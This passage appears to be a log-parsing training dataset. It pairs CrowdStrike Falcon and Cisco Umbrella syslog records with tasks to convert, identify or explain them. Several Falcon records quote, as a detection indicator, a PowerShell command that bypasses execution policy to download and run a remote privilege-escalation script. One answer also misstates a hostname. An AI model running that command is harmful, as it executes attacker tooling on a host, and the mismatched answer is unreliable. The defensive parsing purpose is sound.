remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"fish\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T16:44:43Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "132.101.113.134", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: N/A filename: powershell.exe filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T16:44:43Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 132.101.113.134 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"213.172.189.67\",\"externalIp\":\"36.91.239.212\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "213.172.189.67", "serverIP": "36.91.239.212", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 213.172.189.67 serverIP: 36.91.239.212 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"194.59.48.4\",\"externalIp\":\"252.15.6.158\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-17T14:43:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "194.59.48.4", "serverIP": "252.15.6.158", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-17T14:43:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 194.59.48.4 serverIP: 252.15.6.158 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"3.240.199.65\",\"externalIp\":\"179.82.63.47\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "3.240.199.65", "serverIP": "179.82.63.47", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 3.240.199.65 serverIP: 179.82.63.47 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"199.80.246.3\",\"externalIp\":\"53.35.236.248\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T16:28:22.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "199.80.246.3", "serverIP": "53.35.236.248", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T16:28:22.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 199.80.246.3 serverIP: 53.35.236.248 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"149.22.203.83\",\"externalIp\":\"183.79.58.28\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "149.22.203.83", "serverIP": "183.79.58.28", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
